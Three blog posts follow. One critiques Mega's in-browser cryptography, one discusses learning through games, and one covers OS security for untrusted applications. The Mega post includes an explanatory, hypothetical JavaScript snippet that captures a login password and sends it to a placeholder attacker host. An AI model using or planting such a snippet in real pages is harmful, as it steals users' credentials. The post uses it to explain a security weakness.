Cryptography as Liability Shift

Everybody seems to be talking about Kim Dotcom’s new Mega file-sharing service. What aroused my interest is its use of cryptography. I did not look into it in detail, but from what I read (for example here) it should work as follows (a rough sketch in code follows the list):

  • access to the service is only through a browser, and the code executed in the browser is written in JavaScript;
  • when creating an account, the user chooses a password which is not sent to the server; instead, the browser derives from the password an authentication token which is shared with the server; the server cannot recover the password from the authentication token;
  • the browser generates an encryption key with which all data sent to and received from the server is encrypted and decrypted by the browser itself: the server hosts only encrypted data and has no access to it, since it does not know the encryption key;
  • for user convenience, the encryption key is also stored on the server, but encrypted with the password; in this way the server has no access to the encryption key, but the user can retrieve it whenever needed.
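
To make the flow concrete, here is a minimal sketch of that client-side scheme using the browser’s Web Crypto API. The algorithm choices (PBKDF2, AES-GCM, the key sizes, the way the derived bits are split) are placeholders of mine, not Mega’s actual design:

```typescript
// Sketch of the client-side scheme described above, using the browser's
// Web Crypto API. PBKDF2, AES-GCM, the key sizes and the split of the derived
// bits are my own placeholder choices, not Mega's actual design.

// Derive two secrets from the password: an authentication token that is
// shared with the server, and a wrapping key that never leaves the browser.
async function deriveFromPassword(password: string, salt: Uint8Array) {
  const base = await crypto.subtle.importKey(
    "raw", new TextEncoder().encode(password), "PBKDF2", false, ["deriveBits"]);
  const bits = new Uint8Array(await crypto.subtle.deriveBits(
    { name: "PBKDF2", salt, iterations: 100_000, hash: "SHA-256" }, base, 512));
  const authToken = bits.slice(0, 32);           // sent to the server at signup/login
  const wrapKey = await crypto.subtle.importKey(  // kept only in the browser
    "raw", bits.slice(32), "AES-GCM", false, ["encrypt", "decrypt"]);
  return { authToken, wrapKey };
}

// Generate the master encryption key and prepare the material to upload:
// the server only ever sees the token and the *encrypted* master key.
async function createAccountMaterial(password: string) {
  const salt = crypto.getRandomValues(new Uint8Array(16));
  const { authToken, wrapKey } = await deriveFromPassword(password, salt);

  const masterKey = crypto.getRandomValues(new Uint8Array(32)); // encrypts user files
  const iv = crypto.getRandomValues(new Uint8Array(12));
  const wrappedKey = await crypto.subtle.encrypt(
    { name: "AES-GCM", iv }, wrapKey, masterKey);

  // Uploaded: authToken, salt, iv, wrappedKey.
  // Never uploaded: the password and the plaintext masterKey.
  return { authToken, salt, iv, wrappedKey: new Uint8Array(wrappedKey) };
}
```

The crucial point for what follows is that every secret here lives in code the server sends to the browser on every visit.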

The general idea behind this approach is of course not new, but the way in which it is implemented leaves a lot to think about. Everything is delegated to the browser and implemented in JavaScript, which means, for example, that it is not hard to add (or modify) a piece of JavaScript so that it captures the password and sends it to some other server. This is indeed what most online-banking malware does, by injecting a few lines of JavaScript into the pages of online-banking websites. It is also something the Mega service itself could do at any moment, without the user ever knowing. On top of this, many other points should be checked, for example whether the implementation is sound from a security point of view, and we know very well that it is not at all easy to implement cryptographic protocols correctly on the first attempt.
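As a purely hypothetical illustration of how little it takes (the element ids and the collection URL below are invented, not taken from any real attack):

```typescript
// Hypothetical injected snippet: a few lines are enough to leak the password
// before any client-side cryptography runs. "login-form", "password" and the
// collection URL are made up for illustration.
document.getElementById("login-form")?.addEventListener("submit", () => {
  const pw = (document.getElementById("password") as HTMLInputElement).value;
  // The password goes to a third-party server; the key derivation performed
  // afterwards by the page's own code no longer protects anything.
  void fetch("https://attacker.example/collect", { method: "POST", body: pw });
});
```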

So what is the point of all this? Well, the first thing that comes to my mind (and to other bloggers’ minds) is that the primary purpose is not to protect the users and their data, but to allow Kim Dotcom to shift any legal responsibility for the content hosted on his servers. Since users’ data is encrypted by the browser on the users’ PCs and the server has no access to the encryption keys in the clear, all responsibility for the data hosted on his servers falls on the users.

I am curious to see how this will develop.

UPDATE: there are already search engines to find illegal material to download from Mega…

Learning and Gaming

Recently I have found myself, more than once, reading about or discussing the relationship between play, in this case digital play (on consoles, PCs, or online), and learning. We know very well that play, together with experience, is the main means of learning, both for animals and for ourselves in the first years of our lives.

“You learn by playing (and by making mistakes),” my grandfather used to say…

In fact, on a moment’s reflection, our learning is based mostly on the acquisition of notions, which in my opinion turns into knowledge only when integrated with experience. We also learn a great deal from direct experience alone, but that is a slow process, and one that does not take advantage of what has already been discovered by those who came before us, which we can assimilate easily and quickly.

But what about virtual experience? Do we learn just as well playing with a video game as with real “toys”? Can we replace and extend real play with virtual play? Can we replace part of notion-based learning with playful, virtual learning?

It also made me think that the training of the pilots of the famous F-35 (if it ever flies) is entirely virtual: there is no model with dual controls for instructor and student. From game to flight, without a parachute?

Computer Security from the Bottom Up with a “Clean Slate”

This is the first post on my new blog, and I would like to start with this interview with Robert Watson (Cambridge University, UK) in IEEE Spectrum, which I found interesting. The main points, in my opinion, are:

The role of operating system security has shifted from protecting multiple users from each other toward protecting a single…user from untrustworthy applications.…Embedded devices, mobile phones, and tablets are a point of confluence: The interests of many different parties…must be mediated with the help of operating systems that were designed for another place and time.

[…]

in historic systems, large multiuser computer systems, you know, we had these central servers or central mainframes, lots of end users on individual terminals. The role of the OS was to help separate these users from each other, to prevent accidents, perhaps to control the flow of information. You didn’t want trade secrets leaking from, perhaps, one account on a system to another one.

[…]

So the observation we make on these new end-user systems like phones is that what we’re trying to control is very different. The phone is a place where lots of different applications meet. […]  And on phones today, we encourage users to download things all the time. So what has changed now? Well, we’ve deployed something called sandboxing inside of these phones so that every application you download runs inside its own sandbox. And that is a very different use of security. And it is provided by the operating system, so it’s still a function of the operating system.

The main point is that we should rethink security from the bottom up, starting with a new paradigm for the OS primitives. The main scenario we should add to the historical one is the single-user, multiple-untrusted-applications scenario, whereas all our OSes have been designed for the multiple-users, multiple-trusted-applications scenario.

This also reminds me of Qubes and Bromium, which are efforts to gain greater control over applications by using microkernels and virtual machines as the underlying OS.

An article by Watson will be published in the February 2013 issue of Communications of the ACM.